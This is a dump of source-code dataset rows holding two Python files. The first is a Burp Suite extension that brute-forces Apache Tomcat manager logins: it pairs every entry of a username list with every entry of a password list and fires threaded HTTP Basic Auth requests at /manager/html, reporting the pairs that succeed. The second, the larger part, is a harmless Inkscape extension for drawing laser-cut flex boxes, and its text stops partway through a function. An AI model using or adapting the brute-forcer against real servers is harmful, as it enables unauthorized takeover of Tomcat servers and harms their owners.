max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
TomcatBrute.py | WallbreakerTeam/TomcatBrute | 16 | 12767351 | # encoding: utf-8
'''
Created on 2016-9-9
@author: lynn in WallbreakerTeam
'''
from burp import IBurpExtender, ITab
from javax import swing
from java.lang import Short
class BurpExtender(IBurpExtender, ITab):
'''
get url from proxy history window
'''
def registerExtenderCallbacks(self, callbacks):
self._callbacks = callbacks
self._helpers = callbacks.getHelpers()
self._callbacks.setExtensionName('TomcatBrute')
self._tomcatForceLogin()
self._initTab(callbacks)
# Override ITab Method
def getUiComponent(self):
return self._toolkitTab
def getTabCaption(self):
return 'TomcatBrute'
# ###########################################################
# -------------------------------------------------
def _initTab(self, callbacks):
'''
Initial Burp Tab View
'''
self._toolkitTab = swing.JTabbedPane()
self._toolkitTab.addTab('Tomcat Fs Login', self._tomcatMainPanel)
callbacks.customizeUiComponent(self._toolkitTab)
callbacks.addSuiteTab(self)
# -------------------------------------------------
def _tomcatForceLogin(self):
'''
Tomcat Force Login
'''
self._tomcatMainPanel = swing.JPanel()
self._tomcatMainURLLabel = swing.JLabel('url : ')
self._tomcatMainURLLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
self._tomcatMainURLLabel.setBounds(30, 33, 54, 30);
self._tomcatMainPanel.add(self._tomcatMainURLLabel);
self._tomcatMainURL = swing.JTextField()
self._tomcatMainURL.setBounds(94, 30, 275, 30);
self._tomcatMainURL.setColumns(10);
self._tomcatMainPanel.add(self._tomcatMainURL);
self._tomcatMainUnameLabel = swing.JLabel('name : ')
self._tomcatMainUnameLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
self._tomcatMainUnameLabel.setBounds(30, 76, 54, 30);
self._tomcatMainPanel.add(self._tomcatMainUnameLabel);
self._tomcatMainUname = swing.JTextField()
self._tomcatMainUname.setBounds(94, 73, 207, 30);
self._tomcatMainUname.setColumns(10);
self._tomcatMainUname.setEditable(False)
self._tomcatMainPanel.add(self._tomcatMainUname);
self._tomcatMainPwdLabel = swing.JLabel('pwd : ')
self._tomcatMainPwdLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
self._tomcatMainPwdLabel.setBounds(30, 120, 54, 30);
self._tomcatMainPanel.add(self._tomcatMainPwdLabel);
self._tomcatMainPwd = swing.JTextField()
self._tomcatMainPwd.setBounds(94, 117, 207, 30);
self._tomcatMainPwd.setColumns(10);
self._tomcatMainPwd.setEditable(False)
self._tomcatMainPanel.add(self._tomcatMainPwd);
self._tomcatMainLoadUnames = swing.JButton('users', actionPerformed=self._tomcatLoadUsersFunc)
self._tomcatMainLoadUnames.setBounds(311, 72, 58, 30);
self._tomcatMainPanel.add(self._tomcatMainLoadUnames);
self._tomcatMainLoadPwds = swing.JButton('pwds', actionPerformed=self._tomcatLoadPwdsDicts)
self._tomcatMainLoadPwds.setBounds(311, 116, 58, 30);
self._tomcatMainPanel.add(self._tomcatMainLoadPwds);
self._tomcatMainFsCancel = swing.JButton('cancel', actionPerformed=self._tomcatFsCalcelFunc)
self._tomcatMainFsCancel.setBounds(275, 167, 93, 23);
self._tomcatMainPanel.add(self._tomcatMainFsCancel);
self._tomcatMainFsStart = swing.JButton('start', actionPerformed=self._tomcatFsStartFunc)
self._tomcatMainFsStart.setBounds(94, 167, 93, 23);
self._tomcatMainPanel.add(self._tomcatMainFsStart);
#self._tomcatMainProgressBar = swing.JProgressBar();
#self._tomcatMainProgressBar.setBounds(11, 222, 358, 20);
#self._tomcatMainPanel.add(self._tomcatMainProgressBar);
self._tomcatMainAuthorLabel = swing.JLabel('Powdered by lynn')
self._tomcatMainAuthorLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
self._tomcatMainAuthorLabel.setBounds(11, 222, 358, 20);
self._tomcatMainPanel.add(self._tomcatMainAuthorLabel);
team = ('team:破壁者').decode("utf8")
self._tomcatMainTeamLabel = swing.JLabel(team)
self._tomcatMainTeamLabel.setHorizontalAlignment(swing.SwingConstants.CENTER);
self._tomcatMainTeamLabel.setBounds(11, 242, 358, 20);
self._tomcatMainPanel.add(self._tomcatMainTeamLabel);
self._tomcatMainPanel.setLayout(None)
def _tomcatLoadUsersFunc(self, event):
chooser = swing.JFileChooser()
chooser.showOpenDialog(self._tomcatMainPanel)
filePathName = ''
try:
if(chooser.getSelectedFile()) is not None:
filePathName += (str(chooser.getSelectedFile()).replace('\\', '/'))
self._tomcatMainUname.setText(filePathName.strip())
except:
print 'Open User File Error'
def _tomcatLoadPwdsDicts(self, event):
chooser = swing.JFileChooser()
chooser.showOpenDialog(self._tomcatMainPanel)
filePathName = ''
try:
if(chooser.getSelectedFile()) is not None:
filePathName += (str(chooser.getSelectedFile()).replace('\\', '/'))
self._tomcatMainPwd.setText(filePathName.strip())
except:
print 'Open Pwd File Error'
def _tomcatFsCalcelFunc(self, event):
print '_tomcatFsCalcelFunc'
def _tomcatFsStartFunc(self, event):
if (str(self._tomcatMainURL.getText()).strip()) != '':
import urllib
url = str(self._tomcatMainURL.getText().strip())
if url.startswith('http://') or url.startswith('https://'):
if not url.endswith('/'):
url += '/'
proto, rest = urllib.splittype(url)
host, rest = urllib.splithost(rest)
host2, port = urllib.splitport(host)
host = host.split(':')[0]
if port is None:
port = 80
usersFile = str(self._tomcatMainUname.getText())
pwdsFile = str(self._tomcatMainPwd.getText())
if usersFile != '' and pwdsFile != '':
bruter = Bruter(host, port, usersFile, pwdsFile)
print bruter.doLogin()
else:
print 'Please load dict files'
else:
print 'Check URL'
# ##########################################################
import threading
import time
import httplib
import base64
from collections import deque
results = ''
class TomcatLogin(threading.Thread):
def __init__(self, host, port, user, password):
threading.Thread.__init__(self)
self._host = str(host)
self._port = str(port)
self._user = str(user)
self._password = str(password)
self._userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'
def run(self):
global results
auth = base64.b64encode('%s:%s' % (self._user, self._password)).replace('\n', '')
try:
h = httplib.HTTPConnection(self._host, self._port)
header = {
'User-agent':self._userAgent,
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Authorization':'Basic %s' % auth
}
#print header
h.request('GET', '/manager/html', headers=header)
statuscode = h.getresponse().status
print self._user + ':' + self._password + ';status:' + str(statuscode)
if statuscode == 200:
results += 'Username:' + self._user + " Password:" + self._password
else:
pass
except Exception, msg:
print msg
class Bruter():
def __init__(self, host, port, userFile, pwdFile):
self.host = host
self.port = port
self.userFile = userFile
self.pwdFile = pwdFile
def doLogin(self):
global results
USERNAMEs = [p.replace('\n', '') for p in open(self.userFile, 'r').readlines()]
PASSWORDs = [p.replace('\n', '') for p in open(self.pwdFile, 'r').readlines()]
# list 数组
accounts = deque()
for username in USERNAMEs:
for password in PASSWORDs:
accounts.append((username, password))
for acc in range(len(accounts)):
worker = TomcatLogin(self.host, self.port, accounts[acc][0], accounts[acc][1])
worker.setDaemon(True)
worker.start()
time.sleep(0.1)
#if results == '':
#results = 'Brute Failed'
return results
| 1.882813 | 2 |
Drawbotextension/KM-Laser-master/km_box_flexpath.py | fabloch/DrawbotInkscapeExtensions | 0 | 12767352 | <gh_stars>0
#!/usr/bin/env python3
# paths2flex.py
# This is an Inkscape extension to generate boxes with sides as flex which follow a path selected in inkscape
# The Inkscape objects must first be converted to paths (Path > Object to Path).
# Some paths may not work well -- if the curves are too small for example.
# Written by <NAME> (<EMAIL>), december 2018
# This work is largely inspred from path2openSCAD.py, written by <NAME>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import math
import os.path
import inkex
import re
from lxml import etree
from inkex import bezier
from inkex.paths import Path, CubicSuperPath
DEFAULT_WIDTH = 100
DEFAULT_HEIGHT = 100
objStyle = str(inkex.Style(
{'stroke': '#000000',
'stroke-width': 0.1,
'fill': 'none'
}))
objStyleStart = str(inkex.Style(
{'stroke': '#FF0000',
'stroke-width': 0.1,
'fill': 'none'
}))
class inkcape_draw_cartesian:
def __init__(self, Offset, group):
self.offsetX = Offset[0]
self.offsetY = Offset[1]
self.Path = ''
self.group = group
def MoveTo(self, x, y):
#Retourne chaine de caractères donnant la position du point avec des coordonnées cartesiennes
self.Path += ' M ' + str(round(x-self.offsetX, 3)) + ',' + str(round(y-self.offsetY, 3))
def LineTo(self, x, y):
#Retourne chaine de caractères donnant la position du point avec des coordonnées cartesiennes
self.Path += ' L ' + str(round(x-self.offsetX, 3)) + ',' + str(round(y-self.offsetY, 3))
def Line(self, x1, y1, x2, y2):
#Retourne chaine de caractères donnant la position du point avec des coordonnées cartesiennes
self.Path += ' M ' + str(round(x1-self.offsetX, 3)) + ',' + str(round(y1-self.offsetY, 3)) + ' L ' + str(round(x2-self.offsetX, 3)) + ',' + str(round(y2-self.offsetY, 3))
def GenPath(self):
line_attribs = {'style': objStyle, 'd': self.Path}
etree.SubElement(self.group, inkex.addNS('path', 'svg'), line_attribs)
def GenPathStart(self):
line_attribs = {'style': objStyleStart, 'd': self.Path}
etree.SubElement(self.group, inkex.addNS('path', 'svg'), line_attribs)
class Line:
def __init__(self, a, b, c):
self.a = a
self.b = b
self.c = c
def __str__(self):
return "Line a="+str(self.a)+" b="+str(self.b)+" c="+str(self.c)
def Intersect(self, Line2):
''' Return the point which is at the intersection between the two lines
'''
det = Line2.a * self.b - self.a*Line2.b;
if abs(det) < 1e-6: # Line are parallel, return None
return None
return ((Line2.b*self.c - Line2.c*self.b)/det, (self.a*Line2.c - Line2.a*self.c)/det)
def square_line_distance(self, pt):
'''
Compute the distance between point and line
Distance between point and line is (a * pt.x + b * pt.y + c)*(a * pt.x + b * pt.y + c)/(a*a + b*b)
'''
return (self.a * pt[0] + self.b * pt[1] + self.c)*(self.a * pt[0]+ self.b * pt[1] + self.c)/(self.a*self.a + self.b*self.b)
class Segment(Line):
def __init__(self, A, B):
self.xA = A[0]
self.xB = B[0]
self.yA = A[1]
self.yB = B[1]
self.xm = min(self.xA, self.xB)
self.xM = max(self.xA, self.xB)
self.ym = min(self.yA, self.yB)
self.yM = max(self.yA, self.yB)
Line.__init__(self, A[1] - B[1], B[0] - A[0], A[0] * B[1] - B[0] * A[1])
def __str__(self):
return "Segment "+str([A,B])+ " a="+str(self.a)+" b="+str(self.b)+" c="+str(self.c)
def InSegment(self, Pt):
if Pt[0] < self.xm or Pt[0] > self.xM:
return 0 # Impossible lower than xmin or greater than xMax
if Pt[1] < self.ym or Pt[1] > self.yM:
return 0 # Impossible lower than ymin or greater than yMax
return 1
def __str__(self):
return "Seg"+str([(self.xA, self.yA), (self.xB, self.yB)])+" Line a="+str(self.a)+" b="+str(self.b)+" c="+str(self.c)
def pointInBBox(pt, bbox):
'''
Determine if the point pt=[x, y] lies on or within the bounding
box bbox=[xmin, xmax, ymin, ymax].
'''
# if (x < xmin) or (x > xmax) or (y < ymin) or (y > ymax)
if (pt[0] < bbox[0]) or (pt[0] > bbox[1]) or \
(pt[1] < bbox[2]) or (pt[1] > bbox[3]):
return False
else:
return True
def bboxInBBox(bbox1, bbox2):
'''
Determine if the bounding box bbox1 lies on or within the
bounding box bbox2. NOTE: we do not test for strict enclosure.
Structure of the bounding boxes is
bbox1 = [ xmin1, xmax1, ymin1, ymax1 ]
bbox2 = [ xmin2, xmax2, ymin2, ymax2 ]
'''
# if (xmin1 < xmin2) or (xmax1 > xmax2) or (ymin1 < ymin2) or (ymax1 > ymax2)
if (bbox1[0] < bbox2[0]) or (bbox1[1] > bbox2[1]) or \
(bbox1[2] < bbox2[2]) or (bbox1[3] > bbox2[3]):
return False
else:
return True
def pointInPoly(p, poly, bbox=None):
'''
Use a ray casting algorithm to see if the point p = [x, y] lies within
the polygon poly = [[x1,y1],[x2,y2],...]. Returns True if the point
is within poly, lies on an edge of poly, or is a vertex of poly.
'''
if (p is None) or (poly is None):
return False
# Check to see if the point lies outside the polygon's bounding box
if not bbox is None:
if not pointInBBox(p, bbox):
return False
# Check to see if the point is a vertex
if p in poly:
return True
# Handle a boundary case associated with the point
# lying on a horizontal edge of the polygon
x = p[0]
y = p[1]
p1 = poly[0]
p2 = poly[1]
for i in range(len(poly)):
if i != 0:
p1 = poly[i-1]
p2 = poly[i]
if (y == p1[1]) and (p1[1] == p2[1]) and \
(x > min(p1[0], p2[0])) and (x < max(p1[0], p2[0])):
return True
n = len(poly)
inside = False
p1_x,p1_y = poly[0]
for i in range(n + 1):
p2_x,p2_y = poly[i % n]
if y > min(p1_y, p2_y):
if y <= max(p1_y, p2_y):
if x <= max(p1_x, p2_x):
if p1_y != p2_y:
intersect = p1_x + (y - p1_y) * (p2_x - p1_x) / (p2_y - p1_y)
if x <= intersect:
inside = not inside
else:
inside = not inside
p1_x,p1_y = p2_x,p2_y
return inside
def polyInPoly(poly1, bbox1, poly2, bbox2):
'''
Determine if polygon poly2 = [[x1,y1],[x2,y2],...]
contains polygon poly1.
The bounding box information, bbox=[xmin, xmax, ymin, ymax]
is optional. When supplied it can be used to perform rejections.
Note that one bounding box containing another is not sufficient
to imply that one polygon contains another. It's necessary, but
not sufficient.
'''
# See if poly1's bboundin box is NOT contained by poly2's bounding box
# if it isn't, then poly1 cannot be contained by poly2.
if (not bbox1 is None) and (not bbox2 is None):
if not bboxInBBox(bbox1, bbox2):
return False
# To see if poly1 is contained by poly2, we need to ensure that each
# vertex of poly1 lies on or within poly2
for p in poly1:
if not pointInPoly(p, poly2, bbox2):
return False
# Looks like poly1 is contained on or in Poly2
return True
def subdivideCubicPath(sp, flat, i=1):
'''
[ Lifted from eggbot.py with impunity ]
Break up a bezier curve into smaller curves, each of which
is approximately a straight line within a given tolerance
(the "smoothness" defined by [flat]).
This is a modified version of cspsubdiv.cspsubdiv(): rewritten
because recursion-depth errors on complicated line segments
could occur with cspsubdiv.cspsubdiv().
'''
while True:
while True:
if i >= len(sp):
return
p0 = sp[i - 1][1]
p1 = sp[i - 1][2]
p2 = sp[i][0]
p3 = sp[i][1]
b = (p0, p1, p2, p3)
if bezier.maxdist(b) > flat:
break
i += 1
one, two = bezier.beziersplitatt(b, 0.5)
sp[i - 1][2] = one[1]
sp[i][0] = two[2]
p = [one[2], one[3], two[1]]
sp[i:1] = [p]
# Second degree equation solver.
# Return a tuple with the two real solutions, raise an error if there is no real solution
def Solve2nd(a, b, c):
delta = b**2 - 4*a*c
if (delta < 0):
print("No real solution")
return none
x1 = (-b + math.sqrt(delta))/(2*a)
x2 = (-b - math.sqrt(delta))/(2*a)
return (x1, x2)
# Compute distance between two points
def distance2points(x0, y0, x1, y1):
return math.hypot(x0-x1,y0-y1)
class Path2Flex(inkex.Effect):
def __init__(self):
inkex.Effect.__init__(self)
self.knownUnits = ['in', 'pt', 'px', 'mm', 'cm', 'm', 'km', 'pc', 'yd', 'ft']
self.arg_parser.add_argument('--unit', default = 'mm', help = 'Unit, should be one of ')
self.arg_parser.add_argument('--thickness', type = float, default = '3.0', help = 'Material thickness')
self.arg_parser.add_argument('--zc', type = float, default = '50.0', help = 'Flex height')
self.arg_parser.add_argument('--notch_interval', type = int, default = '2', help = 'Interval between notches')
self.arg_parser.add_argument('--max_size_flex', type = float, default = '1000.0', help = 'Max size of a single band of flex, above this limit it will be cut')
self.arg_parser.add_argument('--Mode_Debug', type = inkex.Boolean, default = 'false', help = 'Output Debug information in file')
# Dictionary of paths we will construct. It's keyed by the SVG node
# it came from. Such keying isn't too useful in this specific case,
# but it can be useful in other applications when you actually want
# to go back and update the SVG document
self.paths = {}
self.flexnotch = []
# Debug Output file
self.fDebug = None
# Dictionary of warnings issued. This to prevent from warning
# multiple times about the same problem
self.warnings = {}
#Get bounding rectangle
self.xmin, self.xmax = (1.0E70, -1.0E70)
self.ymin, self.ymax = (1.0E70, -1.0E70)
self.cx = float(DEFAULT_WIDTH) / 2.0
self.cy = float(DEFAULT_HEIGHT) / 2.0
def unittouu(self, unit):
return inkex.unittouu(unit)
def DebugMsg(self, s):
if self.fDebug:
self.fDebug.write(s)
# Generate long vertical lines for flex
# Parameters : StartX, StartY, size, nunmber of lines and +1 if lines goes up and -1 down
def GenLinesFlex(self, StartX, StartY, Size, nLine, UpDown, path):
for i in range(nLine):
path.Line(StartX, StartY, StartX, StartY + UpDown*Size)
self.DebugMsg("GenLinesFlex from "+str((StartX, StartY))+" to "+str((StartX, StartY + UpDown*Size))+'\n')
StartY += UpDown*(Size+2)
# Generate the path link to a flex step
#
def generate_step_flex(self, step, size_notch, ShortMark, LongMark, nMark, index):
path = inkcape_draw_cartesian(self.OffsetFlex, self.group)
#External part of the notch, fraction of total notch
notch_useful = 2.0 / (self.notchesInterval + 2)
# First, link towards next step
# Line from ((step+1)*size_notch, 0) to ((step+0.5)*size_notch, 0
path.Line((step+1)*size_notch, 0, (step+notch_useful)*size_notch, 0)
if self.flexnotch[index] == 0:
ShortMark = 0
# Then ShortLine from ((step+notch_useful)*size_notch, ShortMark) towards ((step+notch_useful)*size_notch, -Thickness)
path.Line((step+notch_useful)*size_notch, ShortMark,(step+notch_useful)*size_notch, -self.thickness)
# Then notch
path.LineTo(step*size_notch, -self.thickness)
# Then short mark towards other side (step*size_notch, shortmark)
path.LineTo(step*size_notch, ShortMark)
if ShortMark != 0: #Only if there is flex
# Then line towards center
self.GenLinesFlex(step*size_notch, ShortMark + 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, 1, path)
# Then notch
path.Line(step*size_notch, self.height - ShortMark, step*size_notch, self.height + self.thickness)
path.LineTo((step+notch_useful)*size_notch, self.height + self.thickness)
path.LineTo((step+notch_useful)*size_notch, self.height - ShortMark)
if ShortMark != 0:
#Then nMark-1 Lines
self.GenLinesFlex((step+notch_useful)*size_notch, self.height - ShortMark - 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, -1, path)
#Then Long lines internal to notch
self.GenLinesFlex((step+notch_useful/2)*size_notch, 1 - self.thickness, (self.height + 2.0*self.thickness)/nMark - 2, nMark, 1, path)
# link towards next One
path.Line((step+notch_useful)*size_notch, self.height, (step+1)*size_notch, self.height)
if ShortMark != 0:
# notchesInterval *nMark Long lines up to next notch or 2 shorts and nMark-1 long
i = 1
while i < self.notchesInterval:
pos = (i + 2.0) / (self.notchesInterval + 2.0)
if i % 2 :
#odd draw from bottom to top, nMark lines
self.GenLinesFlex((step+pos)*size_notch, self.height - 1, self.height /nMark - 2.0, nMark, -1, path)
else:
# even draw from top to bottom nMark+1 lines, 2 short and nMark-1 Long
path.Line((step+pos)*size_notch, 3, (step+pos)*size_notch, ShortMark)
self.GenLinesFlex((step+pos)*size_notch, ShortMark + 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, 1, path)
path.Line((step+pos)*size_notch, self.height - ShortMark, (step+pos)*size_notch, self.height - 3)
i += 1
# Write path to inkscape
path.GenPath()
def GenerateStartFlex(self, size_notch, ShortMark, LongMark, nMark, index):
'''
Draw the start pattern
The notch is only 1 mm wide, to enable putting both start and end notch in the same hole in the cover
'''
path = inkcape_draw_cartesian(self.OffsetFlex, self.group)
#External part of the notch, fraction of total notch
notch_useful = 1.0 / (self.notchesInterval + 2)
notch_in = self.notchesInterval / (self.notchesInterval + 2.0)
# First, link towards next step
# Line from (, 0) to 0, 0
path.Line(-notch_in*size_notch, 0, 0, 0)
if self.flexnotch[index] == 0:
ShortMark = 0
# Then ShortLine from (-notch_in*size_notch, ShortMark) towards -notch_in*size_notch, Thickness)
path.Line(-notch_in*size_notch, ShortMark, -notch_in*size_notch, -self.thickness)
# Then notch (beware, only size_notch/4 here)
path.LineTo((notch_useful-1)*size_notch, -self.thickness)
# Then edge, full length
path.LineTo((notch_useful-1)*size_notch, self.height+self.thickness)
# Then notch
path.LineTo(-notch_in*size_notch, self.height + self.thickness)
path.LineTo(-notch_in*size_notch, self.height - ShortMark + 1)
if ShortMark != 0:
#Then nMark - 1 Lines
self.GenLinesFlex(-notch_in*size_notch, self.height - ShortMark - 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, -1, path)
# link towards next One
path.Line(-notch_in*size_notch, self.height, 0, self.height)
if ShortMark != 0:
# notchesInterval *nMark Long lines up to next notch or 2 shorts and nMark-1 long
i = 1
while i < self.notchesInterval:
pos = (i - self.notchesInterval) / (self.notchesInterval + 2.0)
if i % 2 :
#odd draw from bottom to top, nMark lines
self.GenLinesFlex(pos*size_notch, self.height - 1, self.height /nMark - 2.0, nMark, -1, path)
else:
# even draw from top to bottom nMark+1 lines, 2 short and nMark-1 Long
path.Line(pos*size_notch, 3, pos*size_notch, ShortMark)
self.GenLinesFlex(pos*size_notch, ShortMark + 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, 1, path)
path.Line(pos*size_notch, self.height - ShortMark, pos*size_notch, self.height - 3)
i += 1
path.GenPath()
def GenerateEndFlex(self, step, size_notch, ShortMark, LongMark, nMark, index):
path = inkcape_draw_cartesian(self.OffsetFlex, self.group)
delta_notch = 1.0 / (self.notchesInterval + 2.0)
if self.flexnotch[index] == 0:
ShortMark = 0
# ShortLine from (step*size_notch, ShortMark) towards step*size_notch, -Thickness)
path.Line(step*size_notch, ShortMark, step*size_notch, -self.thickness)
# Then notch (beware, only 1mm here)
path.LineTo((step+delta_notch)*size_notch, -self.thickness)
# Then edge, full length
path.LineTo((step+delta_notch)*size_notch, self.height+self.thickness)
# Then notch
path.LineTo(step*size_notch, self.height + self.thickness)
path.LineTo(step*size_notch, self.height - ShortMark)
if ShortMark != 0:
#Then nMark - 1 Lines
self.GenLinesFlex(step*size_notch, self.height - ShortMark - 2, (self.height - 2*ShortMark - 2.0)/(nMark-1) - 2.0, nMark-1, -1, path)
path.GenPath()
def GenFlex(self, parent, num_notch, size_notch, xOffset, yOffset):
group = etree.SubElement(parent, 'g')
self.group = group
#Compute number of vertical lines. Each long mark should be at most 50mm long to avoid failures
nMark = int(self.height / 50) + 1
nMark = max(nMark, 2) # At least 2 marks
#Then compute number of flex bands
FlexLength = num_notch * size_notch
nb_flex_band = int (FlexLength // self.max_flex_size) + 1
notch_per_band = num_notch / nb_flex_band + 1
self.DebugMsg("Generate flex structure with "+str(nb_flex_band)+" bands, "+str(num_notch)+" notches, offset ="+str((xOffset, yOffset))+'\n')
#Sizes of short and long lines to make flex
LongMark = (self.height / nMark) - 2.0 #Long Mark equally divide the height
ShortMark = LongMark/2 # And short mark should lay at center of long marks
idx_notch = 0
while num_notch > 0:
self.OffsetFlex = (xOffset, yOffset)
self.GenerateStartFlex(size_notch, ShortMark, LongMark, nMark, idx_notch)
idx_notch += 1
notch = 0
if notch_per_band > num_notch:
notch_per_band = num_notch #for the last one
while notch < notch_per_band - 1:
self.generate_step_flex(notch, size_notch, ShortMark, LongMark, nMark, idx_notch)
notch += 1
idx_notch += 1
num_notch -= notch_per_band
if num_notch == 0:
self.GenerateEndFlex(notch, size_notch, ShortMark, LongMark, nMark, 0)
else:
self.GenerateEndFlex(notch, size_notch, ShortMark, LongMark, nMark, idx_notch)
xOffset -= size_notch * notch_per_band + 10
def getPathVertices(self, path, node=None):
'''
Decompose the path data from an SVG element into individual
subpaths, each subpath consisting of absolute move to and line
to coordinates. Place these coordinates into a list of polygon
vertices.
'''
self.DebugMsg("Entering getPathVertices, len="+str(len(path))+"\n")
if (not path) or (len(path) == 0):
# Nothing to do
return None
# parsePath() may raise an exception. This is okay
simple_path = Path(path).to_arrays()
if (not simple_path) or (len(simple_path) == 0):
# Path must have been devoid of any real content
return None
self.DebugMsg("After parsePath in getPathVertices, len="+str(len(simple_path))+"\n")
self.DebugMsg(" Path = "+str(simple_path)+'\n')
# Get a cubic super path
cubic_super_path = CubicSuperPath(simple_path)
if (not cubic_super_path) or (len(cubic_super_path) == 0):
# Probably never happens, but...
return None
self.DebugMsg("After CubicSuperPath in getPathVertices, len="+str(len(cubic_super_path))+"\n")
# Now traverse the cubic super path
subpath_list = []
subpath_vertices = []
index_sp = 0
for sp in cubic_super_path:
# We've started a new subpath
# See if there is a prior subpath and whether we should keep it
self.DebugMsg("Processing SubPath"+str(index_sp)+" SubPath List len="+str(len(subpath_list))+" Vertices list length="+str(len(subpath_vertices)) +"\n")
if len(subpath_vertices):
subpath_list.append(subpath_vertices)
subpath_vertices = []
self.DebugMsg("Before subdivideCubicPath len="+str(len(sp)) +"\n")
self.DebugMsg(" Bsp="+str(sp)+'\n')
subdivideCubicPath(sp, 0.1)
self.DebugMsg("After subdivideCubicPath len="+str(len(sp)) +"\n")
self.DebugMsg(" Asp="+str(sp)+'\n')
# Note the first point of the subpath
first_point = sp[0][1]
subpath_vertices.append(first_point)
sp_xmin = first_point[0]
sp_xmax = first_point[0]
sp_ymin = first_point[1]
sp_ymax = first_point[1]
n = len(sp)
# Traverse each point of the subpath
for csp in sp[1:n]:
# Append the vertex to our list of vertices
pt = csp[1]
subpath_vertices.append(pt)
#self.DebugMsg("Append subpath_vertice '"+str(pt)+"len="+str(len(subpath_vertices)) +"\n")
# Track the bounding box of this subpath
if pt[0] < sp_xmin:
sp_xmin = pt[0]
elif pt[0] > sp_xmax:
sp_xmax = pt[0]
if pt[1] < sp_ymin:
sp_ymin = pt[1]
elif pt[1] > sp_ymax:
sp_ymax = pt[1]
# Track the bounding box of the overall drawing
# This is used for centering the polygons in OpenSCAD around the (x,y) origin
if sp_xmin < self.xmin:
self.xmin = sp_xmin
if sp_xmax > self.xmax:
self.xmax = sp_xmax
if sp_ymin < self.ymin:
self.ymin = sp_ymin
if sp_ymax > self.ymax:
self.ymax = sp_ymax
# Handle the final subpath
if len(subpath_vertices):
subpath_list.append(subpath_vertices)
if len(subpath_list) > 0:
self.paths[node] = subpath_list
'''
self.DebugMsg("After getPathVertices\n")
index_i = 0
for i in self.paths[node]:
index_j = 0
for j in i:
self.DebugMsg('Path '+str(index_i)+" élément "+str(index_j)+" = "+str(j)+'\n')
index_j += 1
index_i += 1
'''
def DistanceOnPath(self, p, pt, index):
'''
Return the distances before and after the point pt on the polygon p
The point pt is in the segment index of p, that is between p[index] and p[index+1]
'''
i = 0
before = 0
after = 0
while i < index:
# First walk through polygon up to p[index]
before += distance2points(p[i+1][0], p[i+1][1], p[i][0], p[i][1])
i += 1
#For the segment index compute the part before and after
before += distance2points(pt[0], pt[1], p[index][0], p[index][1])
after += distance2points(pt[0], pt[1], p[index+1][0], p[index+1][1])
i = index + 1
while i < len(p)-1:
after += distance2points(p[i+1][0], p[i+1][1], p[i][0], p[i][1])
i += 1
return (before, after)
# Compute position of next notch.
# Next notch will be on the path p, and at a distance notch_size from previous point
# Return new index in path p
def compute_next_notch(self, notch_points, p, Angles_p, last_index_in_p, notch_size):
index_notch = len(notch_points)
# Coordinates of last notch
Ox = notch_points[index_notch - 1][0]
Oy = notch_points[index_notch - 1][1]
CurAngle = Angles_p[last_index_in_p-1]
#self.DebugMsg("Enter cnn:last_index_in_p="+str(last_index_in_p)+" CurAngle="+str(round(CurAngle*180/math.pi))+" Segment="+str((p[last_index_in_p-1], p[last_index_in_p]))+" Length="+str(distance2points(p[last_index_in_p-1][0], p[last_index_in_p-1][1], p[last_index_in_p][0], p[last_index_in_p][1]))+"\n")
DeltaAngle = 0
while last_index_in_p < (len(p) - 1) and distance2points(Ox, Oy, p[last_index_in_p][0], p[last_index_in_p][1]) < notch_size + DeltaAngle*self.thickness/2.0:
Diff_angle = Angles_p[last_index_in_p] - CurAngle
if Diff_angle > math.pi:
Diff_angle -= 2*math.pi
elif Diff_angle < -math.pi:
Diff_angle += 2*math.pi
Diff_angle = abs(Diff_angle)
DeltaAngle += Diff_angle
CurAngle = Angles_p[last_index_in_p]
#self.DebugMsg("cnn:last_index_in_p="+str(last_index_in_p)+" Angle="+str(round(Angles_p[last_index_in_p]*180/math.pi))+" Diff_angle="+str(round(Diff_angle*180/math.pi))+" DeltaAngle="+str(round(DeltaAngle*180/math.pi))+" Distance="+str(distance2points(Ox, Oy, p[last_index_in_p][0], p[last_index_in_p][1]))+"/"+str(notch_size + DeltaAngle*self.thickness/2.0)+"\n")
last_index_in_p += 1 # Go to next point in polygon
# Starting point for the line x0, y0 is p[last_index_in_p-1]
x0 = p[last_index_in_p-1][0]
y0 = p[last_index_in_p-1][1]
# End point for the line x1, y1 is p[last_index_in_p]
x1 = p[last_index_in_p][0]
y1 = p[last_index_in_p][1]
Distance_notch = notch_size + DeltaAngle*self.thickness/2.0
#self.DebugMsg(" compute_next_notch("+str(index_notch)+") Use Segment="+str(last_index_in_p)+" DeltaAngle="+str(round(DeltaAngle*180/math.pi))+"°, notch_size="+str(notch_size)+" Distance_notch="+str(Distance_notch)+'\n')
# The actual notch position will be on the line between last_index_in_p-1 and last_index_in_p and at a distance Distance_notch of Ox,Oy
# The intersection of a line and a circle could be computed as a second degree equation in a general case
# Specific case, when segment is vertical
if abs(x1-x0) <0.001:
# easy case, x= x0 so y = sqrt(d2 - x*x)
solx1 = x0
solx2 = x0
soly1 = Oy + math.sqrt(Distance_notch**2 - (x0 - Ox)**2)
soly2 = Oy - math.sqrt(Distance_notch**2 - (x0 - Ox)**2)
else:
